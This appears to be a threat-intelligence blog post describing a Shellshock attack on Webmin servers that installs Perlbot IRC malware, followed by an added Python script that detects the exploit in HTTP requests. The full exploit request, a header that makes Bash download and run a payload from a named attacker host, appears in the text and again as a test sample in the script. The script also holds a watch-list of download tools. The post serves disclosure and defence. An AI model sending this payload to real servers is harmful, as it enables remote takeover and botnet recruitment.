Web servers vulnerable to CVE-2014-6271, better known as Shellshock, have long been a target for the malware known as LinuxNet Perlbot. However, Juniper Threat Labs recently observed attackers making use of this vulnerability/malware combination to attack new targets.
Shellshock is a vulnerability in GNU Bash, an extremely popular UNIX shell that is often the default shell in Linux distributions. Perlbot is a type of IRC-guided, remote code execution malware, often associated with Distributed Denial of Service (DDoS) campaigns. Attacking Shellshock-vulnerable systems with Perlbot is something of an “introduction to hacking” exercise for junior Red Team members because the relevant modules have been part of Metasploit since 2015.
A different target
The new attack approach we detected involves attackers sending an HTTPS request with an exploit payload to a TLS server operating on a victim server’s port 10000. This is an obvious attempt to compromise systems that use the Webmin web-based management package, whose default administration port is 10000.
The following request carries the exploit. Once the vulnerable server passes the crafted User-Agent header into Bash, the embedded commands download and run the Perlbot malware on the victim system:
GET / HTTP/1.0
Host: x.x.x.x:10000
User-Agent: () { :;}; /bin/bash -c "killall -9 perl;cd /tmp;curl -O http://103.89.71[.]110/root/work/m;wget http://103.89.71[.]110/root/work/m;lwp-download http://103.89.71[.]110/root/work/m;perl m; rm -rf m*"
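As an added defensive example (not code from the Juniper post or from Webmin), the following Python script shows how a detection or triage tool can recognise this request shape: it parses a raw HTTP request, looks in every header value for the Bash function-definition prefix that triggers CVE-2014-6271, extracts the trailing command, any download URLs and the download helpers used, and notes whether the Host header points at Webmin's default port 10000. The two sample requests are constructed here; the first reuses the defanged payload from this post with straight quotes. The detection regex also catches whitespace-free variants such as "(){:;};" and payloads carried in headers other than User-Agent, which goes beyond the single request shown above.

```python
import re

# Trigger pattern for CVE-2014-6271: an environment variable whose value begins with a
# Bash function definition "() { ...; }" followed by extra text, which unpatched Bash
# executed when importing the variable. Whitespace is optional, so "(){:;};" also matches.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;\s*(?P<tail>.+)", re.DOTALL)

# URLs embedded in the payload (a defanged "[.]" is kept so the output stays safe to share).
URL_RE = re.compile(r"https?://[^\s;\"']+")

# Download helpers seen chained in payloads like the one above (assumed watch-list).
DOWNLOADERS = ("curl", "wget", "lwp-download", "fetch", "tftp")

WEBMIN_DEFAULT_PORT = 10000

# Constructed sample: the request from this post, with straight quotes and the same
# defanged download host.
SAMPLE_EXPLOIT = """GET / HTTP/1.0
Host: x.x.x.x:10000
User-Agent: () { :;}; /bin/bash -c "killall -9 perl;cd /tmp;curl -O http://103.89.71[.]110/root/work/m;wget http://103.89.71[.]110/root/work/m;lwp-download http://103.89.71[.]110/root/work/m;perl m; rm -rf m*"
"""

# Constructed benign request against the same port, for comparison.
SAMPLE_BENIGN = """GET /session_login.cgi HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/79.0
"""


def parse_request(raw):
    """Split a raw HTTP request into (request line, {lowercased header name: value})."""
    lines = raw.strip().splitlines()
    request_line = lines[0].strip()
    headers = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return request_line, headers


def host_port(host_header):
    """Return the explicit port in a Host header, or None if there is none."""
    _, sep, port = host_header.rpartition(":")
    return int(port) if sep and port.isdigit() else None


def analyse_request(raw):
    """Flag Shellshock-style header values and pull out the triage-relevant pieces."""
    request_line, headers = parse_request(raw)
    result = {
        "request_line": request_line,
        "shellshock": False,
        "header": None,        # which header carried the function definition
        "tail": None,          # the trailing text Bash would have executed
        "urls": [],
        "downloaders": [],
        "webmin_port": host_port(headers.get("host", "")) == WEBMIN_DEFAULT_PORT,
    }
    for name, value in headers.items():   # any header can carry it, not just User-Agent
        match = SHELLSHOCK_RE.search(value)
        if match:
            tail = match.group("tail").strip()
            result.update(shellshock=True, header=name, tail=tail)
            result["urls"] = sorted(set(URL_RE.findall(tail)))
            result["downloaders"] = [d for d in DOWNLOADERS
                                     if re.search(r"\b%s\b" % re.escape(d), tail)]
            break
    return result


def severity(result):
    """Crude ranking: an exploit aimed at the Webmin default port that fetches a payload ranks highest."""
    if not result["shellshock"]:
        return "none"
    if result["webmin_port"] and result["downloaders"]:
        return "high"
    return "medium"


if __name__ == "__main__":
    for sample in (SAMPLE_EXPLOIT, SAMPLE_BENIGN):
        r = analyse_request(sample)
        print(r["request_line"], "->", severity(r), r["header"], r["urls"], r["downloaders"])
```

The extracted URL list is what an analyst would feed into blocklists or a sandbox, and the header name matters because CGI servers export many request headers into the environment, so a rule keyed only on User-Agent misses the same payload placed in Referer or Cookie.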
Why Webmin as a target?
Webmin is popular amongst system administrators and users alike, as a means to remotely manage and administer computer systems. While Webmin can be installed on multiple operating systems, it is particularly popular in the Linux ecosystem and, thus, a good target for vulnerabilities like Shellshock.
Webmin has long been a popular target for attackers and the standard guidance for Webmin is, above all else, to run Webmin on a non-standard port. Ideally, access would also be restricted to specific IP addresses and HTTPS would be enabled.
When deployed in this manner, it is usually safe to use. However, Webmin is a mature and fairly complicated platform. It consists of a web server, an authentication system and a framework for configuration modules.
It is designed to be extensible and, like any such application, is subject to vulnerabilities not only in its own code but also in its modules and in all the open source components that are packaged together to present it as a web server. As a result, older versions of Webmin are vulnerable to Shellshock, which allows attackers to take control of these servers.
It is unclear why this particular threat actor chose to go after a vulnerability that is not very widespread. Webmin has defaulted to automatic updates for some time now, and Shellshock is an old enough vulnerability that it is used to train junior penetration testers. In addition, according to Shodan.io, there are only a few servers exposing port 10000, meaning that most Webmin administrators are following guidance on hiding access.
Nevertheless, there are vulnerable Webmin servers out there, even if there aren’t many of them. If you wanted to use Shellshock to attack something, that cohort of out-of-date Webmin-managed Linux servers is a great target.
Anatomy of the attack
This incident is notable in part because it is exploiting Shellshock through a TLS connection (Shellshock is more likely to be unpatched on systems too old to have enabled TLS) and in part because of its origin.
The attack was detected by Juniper Threat Labs from the source IP address 103.80.18.4, which is a system known for hosting many Chinese language websites, as well as being a source of attacks targeting Hadoop clusters and RDP servers.
The IRC server that the Perlbot install connects to is located at 51.195.54.178. The combination of Perlbot and Shellshock has predominantly been associated with DDoS campaigns, partly because, while Shellshock gives attackers the ability to execute arbitrary commands, those commands run only in the user context of the compromised service.
What can an attacker do with this capability?
If the compromised web server is running as the Webmin user, for example, then any commands an attacker runs execute in the Webmin user context. Without an additional privilege escalation to gain root privileges, TCP and/or UDP floods are among the few easy ways to make use of this access.
Simply because DDoSing is the easiest way to make use of a compromise where an attacker has only limited system privileges doesn’t mean it is the only way. Most applications on a Linux server operate using “ordinary”, or unprivileged, Linux users, such as Webmin. While it requires an additional privilege escalation exploit in order to gain privileged access to the compromised system, those ordinary users can still make use of a great deal of the standard GNU toolset installed on your average Linux web server.
For example, attackers can use wget to launch attacks against other web servers, or make use of any of the other userspace tools or applications that the user context they have appropriated has access to. At the moment, we have no evidence that the attacker in question is using their access in new ways; however, targeting an HTTPS-enabled Webmin server is new.
As we wrap up this writing, the attack seems to have subsided, only occurring on July 28 and August 2, 2020. There is a possibility this was a proof of concept for something larger to come.
Special thanks to Alex Burt from Juniper Threat Labs for his help on the research around this blog.